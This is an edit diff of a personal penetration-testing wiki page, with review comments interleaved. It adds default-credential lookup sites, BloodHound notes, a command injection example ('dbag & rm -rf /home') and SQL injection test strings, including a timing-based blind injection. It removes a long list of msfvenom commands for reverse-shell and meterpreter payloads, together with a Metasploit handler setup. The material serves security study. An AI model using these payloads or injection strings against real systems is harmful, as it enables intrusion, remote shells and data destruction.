The gMan nixWiki

Because the mind is made of Teflon...

method_4_exploitation

Differences

This shows you the differences between two versions of the page.

method_4_exploitation [2022/12/31 00:31] – [Overview] gman
method_4_exploitation [2023/01/12 00:27] (current) – [Defaults] gman
Line 49: Line 49:
 ---- ----
  
 +====== Defaults ======
 +
 +Many folks leave many devices with factory defaults. You can quickly look up the default login creds here: 
 +  * https://www.defaultpassword.com/
 +  * https://default-password.info/
 +  * https://cirt.net/passwords
 +  * [[https://www.google.com/search?q=default+passwords | Or just Google "default passwords"]]. There are a ton of sites.
 +
 +---- 
 ====== Tools ====== ====== Tools ======
 +
 +===== Bloodhound =====
 +
 +[[https://www.kali.org/tools/bloodhound/ | Bloodhound]] is a tool to //**visualize**// Active Directory (AD) objects and permissions.
 +
 +**NOTE:** Bloodhound cannot be used by itself. You need to feed this puppy...
 +  * You have to aquire the AD info first using a tool like [[https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux | Sharphound]].
 +    * You must be a domain member to run it.
 +    * It will enumerate the AD domain.
 +  * Then, you feed the Sharphound info into Bloodhound
 +    - Analyze the results to build a target list.
 +    - Build a list of Domain Admins.
 +
 ===== curl ===== ===== curl =====
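Review bot: "aquire" in the Sharphound bullet should be "acquire", and the link labelled Sharphound points at an ired.team walkthrough of BloodHound on Kali rather than at the SharpHound collector itself; either relabel the link or point it at the collector. The nested lists under Bloodhound also switch from "*" bullets to "-" numbered items mid-list, so pick one style. In the Defaults section it is worth stating the defensive point next to the lookup sites: a device still on factory credentials is a finding on its own, and the remediation is to change them and check for that condition during hardening.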
  
Line 113: Line 135:
  
 ---- ----
-====== MetaSploit ======+===== MetaSploit =====
  
-===== msfvenom =====+See [[cheat_sheets_metasploit| here]]. 
 + 
 +==== msfvenom ====
  
 See [[cheat_sheets_various#msfvenom | here]]. See [[cheat_sheets_various#msfvenom | here]].
- 
----- 
- 
-===== MSF Handler ===== 
- 
-''msfconsole''...Handlers should be in the following format: 
- 
-<code> 
-use exploit/multi/handler 
-set PAYLOAD <Payload name> 
-set LHOST <LHOST value> 
-set LPORT <LPORT value> 
-</code> 
- 
----- 
- 
-===== Non-Meterpreter Binaries ===== 
- 
-**Staged Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Stageless Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Staged Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-**Stageless Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-===== Non-Meterpreter Web Payloads ===== 
- 
-<code> 
-# asp  
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp 
- 
-# jsp 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp 
- 
-# war 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war 
- 
-# php 
-msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php 
-</code> 
- 
-===== Meterpreter Binaries ===== 
- 
-**Staged Payloads for Windows** 
- 
-<code> 
- 
-# x86 
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Stageless Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Staged Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-**Stageless Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-===== Meterpreter Web Payloads ===== 
- 
-<code> 
-# asp 
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp 
- 
-# jsp 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp 
- 
-# war 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war 
- 
-# php 
-msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php 
-</code> 
  
 ---- ----
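Review bot: the MSF Handler section and every msfvenom payload listing are deleted here and replaced by a single link to cheat_sheets_metasploit; confirm that page actually contains the handler and payload sections before this goes in, otherwise the content is lost rather than moved. When carrying the listings over, fix the x64 line under "Stageless Payloads for Windows": it uses windows/shell_reverse_tcp, the same module as the x86 line directly above it, so the two commands are identical, while the staged block shows the intended x64 naming pattern. The demotion of the headings to "=====" and "====" is consistent with the other entries under Tools, and the "See here" link line carries a trailing space.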
Line 306: Line 198:
   * It works with a variety of protocols.   * It works with a variety of protocols.
   * It's a bit more difficult to use. The author says it's "less script kiddie friendly."   * It's a bit more difficult to use. The author says it's "less script kiddie friendly."
 +
 +----
 +
 +====== Injection Attacks ======
 +
 +===== Command =====
 +
 +**Command Injection Attacks:** These are attacks that attempt to send commands through a web app to the operating system.
 +  * It would give you the ability to directly manipulate the o/s.
 +  * On Linux, use the ''system()'' call to send commands to the o/s itself.
 +
 +**Example:** If an app asks for a username to set up an account (assuming the username dbag)
 +  * When we create our account with the username "dbag," the back-end result sent to the o/s would be something like: 
 +    * ''system('mkdir /home/dbag')''
 +  * Using command injection, you add commands to our user input:
 +    * ''dbag & rm -rf /home''
 +  * This would result in a command like this: 
 +    * ''system('mkdir /home/dbag & rm -rf /home')''
 +  * And that's bad.
 +
 +===== SQLi =====
 +
 +
 +**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box.
 +
 +<code>
 +' or '1'='1
 +</code>
 +
 +==== Tool: SQLMap ====
 +
 +Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target.
 +
 +==== Blind SQLi ====
 +
 +Blind SQL injection takes two forms: boolean-based (T/F) and timing-based.
 +
 +**Boolean-Based Blind SQLi:** Uses a boolean (T/F) SQL injection statement to test if the injected code gets through. 
 +  - Test for a standard SQL injection vulnerability by placing a boolean TRUE after valid input.
 +    * If it is vulnerable it will match ALL results.
 +    * If it is not vulnerable, you will get a normal result (as if you did not send the ''1=1'')
 +  - Further test the vulnerability by sending it a boolean FALSE.
 +    * Since 1 never equals 2, this should never return results.
 +    * If it returns results on your valid input, there is no vulnerability
 +    * If it returns no results, then the injection worked.
 +
 +<code>
 +# 1. TRUE test example. Your input into target web app:
 +[valid input]' OR 1=1;--
 +
 +# 2. FALSE test example. Your input into target web app:
 +[valid input]' AND 1=2;--
 +</code>
 +
 +**Timing-Based Blind SQLi:** relies on the amount of time required to process a query.
 +  * If the app returns on the query immediately, it's probably not vulnerable.
 +  * If there is a delay/pause (based on your query statement) before the return, the injection worked.
 +  * Example:
 +
 +<code>[valid input]'; WAITFOR DELAY '00:00:15';--</code>
 +
 +**Tools:** Metasploit & SQLMap.
 +  * They automate these timing-based attacks, making them fairly easy. 
  
 ---- ----
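Review bot: the bullet "On Linux, use the system() call to send commands to the o/s itself" reads as an instruction to the reader, but system() is what the vulnerable application calls; reword it so the bug is clear, i.e. the app passes unsanitized user input into system() (or an equivalent shell-out). The example is also the natural place to state the mitigation: never build a shell command from user input, and use parameterized queries for the SQLi cases below. In the timing-based example, say that WAITFOR DELAY is T-SQL (Microsoft SQL Server) syntax; an immediate response from a different database engine says nothing about whether it is vulnerable, so the "probably not vulnerable" bullet is overstated as written. Finally, drop one of the two blank lines after the "SQLi" heading, and the "Example:" bullet under Timing-Based is followed by a code block outside the list, so either remove the bullet or indent the code under it.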
Line 333: Line 288:
  
 https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/  (scroll down) https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/  (scroll down)
- 
----- 
- 
-====== SQLi ====== 
- 
-**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box. 
- 
-<code> 
-' or '1'='1 
-</code> 
- 
-===== Tool: SQLMap ===== 
- 
-Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target. 
  
 ---- ----
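Review bot: this removes the standalone top-level SQLi section that the earlier hunk re-homes under Injection Attacks; the text and the test-string code block match the new location line for line, so this is a move rather than a loss. Verify that no other page links to method_4_exploitation#sqli expecting the old placement; DokuWiki derives the anchor from the heading text, so it should still resolve to the relocated section, but it is worth a check since the heading level and parent changed.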
method_4_exploitation.1672446687.txt.gz · Last modified: by gman